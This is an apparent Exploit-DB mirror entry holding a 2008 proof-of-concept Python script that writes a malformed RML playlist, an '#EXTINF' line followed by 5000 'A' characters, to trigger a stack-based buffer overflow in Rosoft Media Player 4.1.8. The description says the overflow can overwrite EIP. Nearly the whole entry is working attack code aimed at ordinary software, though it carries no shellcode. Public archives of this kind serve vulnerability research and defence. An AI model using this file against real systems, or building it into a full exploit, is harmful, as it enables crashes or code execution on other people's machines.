exploit-db-mirror/exploits/windows/dos/5261.py
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

20 lines
No EOL
504 B
Python
Executable file

Description:
This is nothing special - there is just flaw in Rosoft Media Player 4.1.8, similar to one discovered by Juan Pablo Lopez Yacubian.
This one concerns RML file. This is Stack Based Buffer Overflow vulerability - we can ovewrite EIP. I hope that it was not reported before.
Author: Wiktor Sierocinski
POC:
#!/usr/bin/python
content = (
"#EXTINF:Played=0\n" + "A" * 5000 + "\n"
)
fd = open("music.rml","w");
fd.write(content)
fd.close();
print "RML FILE CREATED"
# milw0rm.com [2008-03-15]